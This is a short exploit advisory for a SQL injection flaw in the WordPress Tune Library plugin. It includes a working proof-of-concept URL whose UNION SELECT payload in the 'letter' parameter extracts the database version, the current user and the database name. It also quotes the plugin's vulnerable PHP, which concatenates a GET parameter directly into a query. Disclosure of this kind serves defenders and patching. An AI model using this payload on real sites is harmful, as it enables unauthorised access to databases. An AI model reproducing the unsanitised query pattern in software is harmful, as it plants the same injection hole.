# Exploit Title: WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability # Date: 2011-09-10 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/tune-library.zip # Version: 1.5.1 (tested) # Notes: magic_quotes has to be turned off # Plugin setting "Filter artists by letter and show alphabetical navigation" has to be turned on --- PoC --- http://www.site.com/wp-content/plugins/tune-library/tune-library-ajax.php?letter=-1' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20 --------------- Vulnerable code --------------- $artistletter = $_GET['letter']; ... if ($options['oneletter'] == false || $showallartists == true) ... else { if ($artistletter == '#') ... else { $querystr ="SELECT distinct artist, 'artist' as source FROM " . $wpdb->prefix . "tracks where artist != '' and artist like '" .$artistletter . "%' order by artist"; } }